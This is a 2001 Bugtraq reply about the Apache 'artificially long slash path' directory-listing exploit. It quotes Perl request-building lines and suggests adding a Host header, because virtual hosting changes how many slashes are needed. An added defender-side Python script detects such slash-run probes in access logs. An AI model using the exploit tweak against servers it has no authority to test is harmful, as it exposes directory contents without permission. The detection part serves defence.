Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit

From: Stephen Cope (mail-d-20010615at_private)
Date: Thu Jun 14 2001 - 19:48:44 PDT


    In my testing you need to take the Host header into account.
    
    :   $url = "GET ";
    :   $buffer = "/" x $low . " HTTP/1.0\r\n";
    :   $end = "\r\n\r\n";
    
    The server I tested against uses mod_rewrite to do virtual hosting, and it
    arrived at a different magic number with the host header, and again
    without the header.
    
    I made the following change to the above code:
    
      $buffer = "/" x $low . " HTTP/1.0\r\nHost: ". $host ."\r\n";
    
    Should be fairly easy to understand.
    
    -- 
    Stephen Cope <http://sdc.org.nz/>
    Sign the petition and Stop the Pop: http://lifefm.org.nz/petition/
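
A defender-side check for the request pattern this thread discusses, as an added example that is not part of the original post: it scans an Apache access log for clients that request several different long runs of slashes, grouped per virtual host because the message above reports that the length differs with Host handling. The log layout (`%v %h %l %u %t "%r" %>s %b`), the thresholds and all function names are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict

# Assumed log layout: LogFormat "%v %h %l %u %t \"%r\" %>s %b"
LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
SLASH_RUN = re.compile(r'/{2,}')

def longest_slash_run(path):
    """Length of the longest run of two or more consecutive '/' in path."""
    return max((len(m.group()) for m in SLASH_RUN.finditer(path)), default=0)

def find_slash_probes(lines, min_run=32, min_distinct=3):
    """Report (client, vhost) pairs that tried at least min_distinct
    different slash-run lengths of min_run or more (thresholds assumed)."""
    seen = defaultdict(dict)  # (client, vhost) -> {run_length: status}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        run = longest_slash_run(m.group('path'))
        if run >= min_run:
            seen[(m.group('client'), m.group('vhost'))][run] = m.group('status')
    report = {}
    for key, runs in seen.items():
        if len(runs) >= min_distinct:
            report[key] = {
                'lengths': sorted(runs),
                # lengths the server answered with 200 deserve a manual look
                'answered_200': sorted(n for n, s in runs.items() if s == '200'),
            }
    return report

def sample_log():
    """Constructed log lines for the demo (not from the original post)."""
    def row(vhost, client, path, status):
        return (f'{vhost} {client} - - [14/Jun/2001:19:40:00 -0700] '
                f'"GET {path} HTTP/1.0" {status} 512')
    rows = [row('a.example.test', '192.0.2.10', '/index.html', 200),
            row('a.example.test', '192.0.2.10', '/docs//faq.html', 200)]
    rows += [row('a.example.test', '198.51.100.7', '/' * n, 200 if n == 120 else 403)
             for n in (100, 110, 120, 130)]
    rows += [row('b.example.test', '198.51.100.7', '/' * n, 403) for n in (100, 110)]
    return rows

if __name__ == '__main__':
    for (client, vhost), info in find_slash_probes(sample_log()).items():
        print(client, vhost, info)
```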
    


